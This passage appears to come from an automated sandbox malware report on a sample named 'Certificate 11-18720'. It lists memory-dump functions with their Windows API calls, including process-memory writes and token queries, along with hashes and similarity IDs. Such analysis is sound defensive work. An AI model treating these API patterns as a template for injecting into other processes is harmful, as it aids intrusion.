                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: 61ec2c78e6ddf34a80edc4951287ee9b245b50503dba341d89f0722dd76c4627
                                                                                    • Instruction ID: a19261103153d82e9ad6b1fd4b86ed98ab1c2a54b40377cd99a503f91c250b81
                                                                                    • Opcode Fuzzy Hash: 61ec2c78e6ddf34a80edc4951287ee9b245b50503dba341d89f0722dd76c4627
                                                                                    • Instruction Fuzzy Hash: 0C018B7AA00619BFDB114F68EC44BBEBEEEEB85352F148024FA05D2210D778DD409BA0
                                                                                    Function 005FAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005FAA79
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005FAA83
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005FAA92
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005FAA99
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005FAAAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: ddfdb1457ada7f62f95c04c00bb8473863fa5c5efb421d611a3a7b148d288b36
                                                                                    • Instruction ID: f4bcdaf91a6000be8c972fd337f9d73e334951e08911f57e1f4b048013105296
                                                                                    • Opcode Fuzzy Hash: ddfdb1457ada7f62f95c04c00bb8473863fa5c5efb421d611a3a7b148d288b36
                                                                                    • Instruction Fuzzy Hash: 70F04F796002187FEB115FA4AC89E7B3FADFF4A794F001419FA45C7190DA649C45CA62
                                                                                    Function 005FAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005FAADA
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005FAAE4
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005FAAF3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005FAAFA
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005FAB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: a64025631f91e289057d3131122d0e552f58da52ef096e645b2ff7744fe03dc9
                                                                                    • Instruction ID: ae47b9f27c86a98416c7aad72fc109f074128fa58c42f600b38c150294a0bf93
                                                                                    • Opcode Fuzzy Hash: a64025631f91e289057d3131122d0e552f58da52ef096e645b2ff7744fe03dc9
                                                                                    • Instruction Fuzzy Hash: 45F04F757002087FEB111FA4EC88E7B3B6EFF46754F001029FA45C7190CA6498018A62
                                                                                    Function 005FEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 005FEC94
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 005FECAB
                                                                                    • MessageBeep.USER32(00000000), ref: 005FECC3
                                                                                    • KillTimer.USER32(?,0000040A), ref: 005FECDF
                                                                                    • EndDialog.USER32(?,00000001), ref: 005FECF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 52c59a5598bf1f3ea9fca66e94f9fa1cddecc854d675215aa99bb6e197c7e3cb
                                                                                    • Instruction ID: c3e0a98e63900d8bf4e0c15070c0cf8e7f970791fb94a223967b3d5d41a3e568
                                                                                    • Opcode Fuzzy Hash: 52c59a5598bf1f3ea9fca66e94f9fa1cddecc854d675215aa99bb6e197c7e3cb
                                                                                    • Instruction Fuzzy Hash: 1101D134900758ABEB24AF10DE4FBA67BB9FB01705F00055DB682A14E0DBF4AE44CB50
                                                                                    Function 005DB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 005DB0BA
                                                                                    • StrokeAndFillPath.GDI32(?,?,0063E680,00000000,?,?,?), ref: 005DB0D6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DB0E9
                                                                                    • DeleteObject.GDI32 ref: 005DB0FC
                                                                                    • StrokePath.GDI32(?), ref: 005DB117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: 706ed3d2a81b6b12814959849cbda3aa1c553b3e64b7a85daa25dba812a3fa21
                                                                                    • Instruction ID: 9fb1ed4844f4c32aeb412a8e8e78e9d612f173601c51c5a15495d54e230ff735
                                                                                    • Opcode Fuzzy Hash: 706ed3d2a81b6b12814959849cbda3aa1c553b3e64b7a85daa25dba812a3fa21
                                                                                    • Instruction Fuzzy Hash: 1BF01938000244EFEB219F69EC0C7543F6BBB027A2F28A316E4A5491F0D7318AA6CF10
                                                                                    Function 0060F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0060F2DA
                                                                                    • CoCreateInstance.OLE32(0064DA7C,00000000,00000001,0064D8EC,?), ref: 0060F2F2
                                                                                    • CoUninitialize.OLE32 ref: 0060F555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 948891078-24824748
                                                                                    • Opcode ID: 020af1a66e5e69d3ac1d896e66718f6b591745c10b59cbee83ab24241e79ee14
                                                                                    • Instruction ID: b0e1b1e3556752b8caaddd496b0e32a679f744859471ffffcad7c918b2982aa5
                                                                                    • Opcode Fuzzy Hash: 020af1a66e5e69d3ac1d896e66718f6b591745c10b59cbee83ab24241e79ee14
                                                                                    • Instruction Fuzzy Hash: B1A12B71104202AFD300EFA4C895EABBBADFFD8714F00495EF55597292EB70EA49CB52
                                                                                    Function 0060E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005C53B1,?,?,005C61FF,?,00000000,00000001,00000000), ref: 005C662F
                                                                                    • CoInitialize.OLE32(00000000), ref: 0060E85D
                                                                                    • CoCreateInstance.OLE32(0064DA7C,00000000,00000001,0064D8EC,?), ref: 0060E876
                                                                                    • CoUninitialize.OLE32 ref: 0060E893
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 6bfc49a058fad0db0077aa7d1c81c27ab5adf1e3461f8a8b4e13449867366f2a
                                                                                    • Instruction ID: 26c66c23b0ebd20fc0d83c8a7bb4eb7fcba715782ef0af59d5cd7a8dcecca86f
                                                                                    • Opcode Fuzzy Hash: 6bfc49a058fad0db0077aa7d1c81c27ab5adf1e3461f8a8b4e13449867366f2a
                                                                                    • Instruction Fuzzy Hash: ACA145356043129FCB14DF54C488E6ABBE6BF89710F04895DF99A9B3A1CB32EC45CB91
                                                                                    Function 005E325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 005E32ED
                                                                                      • Part of subcall function 005EE0D0: __87except.LIBCMT ref: 005EE10B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 9a85d7331c06f287917bff7ef0ad214d1486b038b88bbbae119f4a4fc0927657
                                                                                    • Instruction ID: 6b1ddcc068445dba6bc31e2b42743ae6998e1414186b2f65e0cfad2fb2e32291
                                                                                    • Opcode Fuzzy Hash: 9a85d7331c06f287917bff7ef0ad214d1486b038b88bbbae119f4a4fc0927657
                                                                                    • Instruction Fuzzy Hash: 59516D75A183C396CB1DBB16C90A77A2F95BB81710F209D68F4D5832E9EF348DC8D642
                                                                                    Function 00604606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0065DC50,?,0000000F,0000000C,00000016,0065DC50,?), ref: 00604645
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 006046C5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper$__itow__swprintf
                                                                                    • String ID: REMOVE$THIS
                                                                                    • API String ID: 3797816924-776492005
                                                                                    • Opcode ID: 5483d22b69683050e7114d31c1225ea194d4eaf9e5819d96ef769c58b51bf058
                                                                                    • Instruction ID: 5fb022ac2f1d52f9e986dff1c30b9adacbf05332f2ca21c84ad5551a85d80ed5
                                                                                    • Opcode Fuzzy Hash: 5483d22b69683050e7114d31c1225ea194d4eaf9e5819d96ef769c58b51bf058
                                                                                    • Instruction Fuzzy Hash: 1B41A574A4011A9FCF14DF94C845AAEBBB6FF85304F148459EA16AB3A2DF34DD41CB50
                                                                                    Function 005FC189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0060430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005FBC08,?,?,00000034,00000800,?,00000034), ref: 00604335
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 005FC1D3
                                                                                      • Part of subcall function 006042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00604300
                                                                                      • Part of subcall function 0060422F: GetWindowThreadProcessId.USER32(?,?), ref: 0060425A
                                                                                      • Part of subcall function 0060422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,005FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0060426A
                                                                                      • Part of subcall function 0060422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,005FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00604280
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005FC240
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005FC28D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: b1a03f1853d564242eade6d01e2b51fd014248ca4146666fee2ae4c402c4f125
                                                                                    • Instruction ID: 56de45ae93d61f34726d6e2b2a0577a9795e1b013dfa15bcdacf41f1ad57d75e
                                                                                    • Opcode Fuzzy Hash: b1a03f1853d564242eade6d01e2b51fd014248ca4146666fee2ae4c402c4f125
                                                                                    • Instruction Fuzzy Hash: 18413B76A0021CBEDB14EBA4CD81AEEBB79FF09700F004099FA45B7181DA756E45CB61
                                                                                    Function 0062A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0065DC00,00000000,?,?,?,?), ref: 0062A6D8
                                                                                    • GetWindowLongW.USER32 ref: 0062A6F5
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0062A705
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID: SysTreeView32
                                                                                    • API String ID: 847901565-1698111956
                                                                                    • Opcode ID: cd7436b18badc8f184512256ca404f7c9e9b437ba12d6e3aceb2d07c78dd4d40
                                                                                    • Instruction ID: a2f336323c7252967954b238a152a4cf904180735bba0772c77289213cd790cb
                                                                                    • Opcode Fuzzy Hash: cd7436b18badc8f184512256ca404f7c9e9b437ba12d6e3aceb2d07c78dd4d40
                                                                                    • Instruction Fuzzy Hash: 40310135200A16AFDB218FB8DC44BEA7BAAFB49324F244325F875932E0D770E850CB54
                                                                                    Function 00615180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00615190
                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 006151C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CrackInternet_memset
                                                                                    • String ID: |$Da
                                                                                    • API String ID: 1413715105-2787809871
                                                                                    • Opcode ID: 7413713ded34248493a81068f475e768174299298c0516c52e1615ff30e0e678
                                                                                    • Instruction ID: 36b3079f7252e062be258901fa2c1de6fe1e8709d99f752a42ab37df76d06f85
                                                                                    • Opcode Fuzzy Hash: 7413713ded34248493a81068f475e768174299298c0516c52e1615ff30e0e678
                                                                                    • Instruction Fuzzy Hash: 6E31197580011AAFCF11EFE4CC45EEEBFB9FF54700F140059E919A6165DA31AA46DB60
                                                                                    Function 0062A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0062A15E
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0062A172
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0062A196
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window
                                                                                    • String ID: SysMonthCal32
                                                                                    • API String ID: 2326795674-1439706946
                                                                                    • Opcode ID: 5fb18d5aa731773f3cd5d3bca8b1b2ca7a1ecf24dd0168453c15f99644be0cb9
                                                                                    • Instruction ID: 84b0627a1b9dbf6baf4a9b36e9a28ff741e3a36a2745f5eb783bd28cb8415eb5
                                                                                    • Opcode Fuzzy Hash: 5fb18d5aa731773f3cd5d3bca8b1b2ca7a1ecf24dd0168453c15f99644be0cb9
                                                                                    • Instruction Fuzzy Hash: D521BF32500628BBDF158FA4DC46FEA3B7AEF48724F110214FA556B1D0D6B5AC65CBA0
                                                                                    Function 0062A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0062A941
                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0062A94F
                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0062A956
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                    • String ID: msctls_updown32
                                                                                    • API String ID: 4014797782-2298589950
                                                                                    • Opcode ID: cb99b94f42c965480f9431715e8e9cc1b5036f367d0b1fb1060367b1d673a12e
                                                                                    • Instruction ID: 7703ace40a7d59e44af5b55d6c64c6d3698c4f9ab71564bd22f9e6b0df1b951d
                                                                                    • Opcode Fuzzy Hash: cb99b94f42c965480f9431715e8e9cc1b5036f367d0b1fb1060367b1d673a12e
                                                                                    • Instruction Fuzzy Hash: FF21E2B4600619BFDB00DF58DC91DA737AEEF4A354B050159FA049B351CB70EC42CB61
                                                                                    Function 006299A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00629A30
                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00629A40
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00629A65
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
